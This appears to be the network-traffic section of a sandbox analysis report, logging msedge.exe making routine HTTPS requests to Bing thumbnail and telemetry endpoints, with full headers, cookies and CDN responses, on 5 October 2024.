https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=93&pcl=fffffa&r=0&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.162:443

Request

GET /th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=93&pcl=fffffa&r=0&o=6&pid=1.2 HTTP/1.1
Host: th.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144349&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Type: image/png
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 616
Cache-Control: public, max-age=899584
Date: Sat, 05 Oct 2024 16:05:51 GMT
X-Cache: TCP_MEM_HIT from a92-123-119-183.deploy.akamaitechnologies.com (AkamaiGHost/11.6.4-e26983a004e229b4ffa935b6e3b2fe8f) (-)
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.b7777b5c.1728144351.e1f465a
X-Check-Cacheable: YES
GET

https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=94&pcl=fffffa&r=0&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.162:443

Request

GET /th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=94&pcl=fffffa&r=0&o=6&pid=1.2 HTTP/1.1
Host: th.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144349&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Type: image/png
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 616
Cache-Control: public, max-age=917886
Date: Sat, 05 Oct 2024 16:05:51 GMT
X-Cache: TCP_MEM_HIT from a92-123-119-186.deploy.akamaitechnologies.com (AkamaiGHost/11.6.4-e26983a004e229b4ffa935b6e3b2fe8f) (-)
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.ba777b5c.1728144351.736047
X-Check-Cacheable: YES
GET

https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=95&pcl=fffffa&r=0&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.162:443

Request

GET /th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=95&pcl=fffffa&r=0&o=6&pid=1.2 HTTP/1.1
Host: th.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144349&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Type: image/png
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 616
Cache-Control: public, max-age=720804
Date: Sat, 05 Oct 2024 16:05:51 GMT
X-Cache: TCP_MEM_HIT from a92-123-119-189.deploy.akamaitechnologies.com (AkamaiGHost/11.6.4-e26983a004e229b4ffa935b6e3b2fe8f) (-)
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.bd777b5c.1728144351.184f1cd7
X-Check-Cacheable: YES
GET

https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=99&pcl=fffffa&r=0&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.162:443

Request

GET /th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=99&pcl=fffffa&r=0&o=6&pid=1.2 HTTP/1.1
Host: th.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144350&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3

Response

HTTP/1.1 200 OK

Content-Type: image/png
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 616
Cache-Control: public, max-age=899646
Date: Sat, 05 Oct 2024 16:05:51 GMT
X-Cache: TCP_MEM_HIT from a92-123-119-189.deploy.akamaitechnologies.com (AkamaiGHost/11.6.4-e26983a004e229b4ffa935b6e3b2fe8f) (-)
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.bd777b5c.1728144351.184f1cdd
X-Check-Cacheable: YES
GET

https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144350712%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144350712%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144350&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:51 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.86777b5c.1728144351.1154e4da
GET

https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1728144350821%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221624%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1728144350824%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%222090%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1728144350824%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1728144350847%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144350883%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1728144350821%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221624%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1728144350824%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%222090%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1728144350824%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1728144350847%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144350883%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; SRCHHPGUSR=SRCHLANG=en&HV=1728144350&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; USRLOC=HS=1&BLOCK=TS=241005160551

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:51 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.86777b5c.1728144351.1154e507
GET

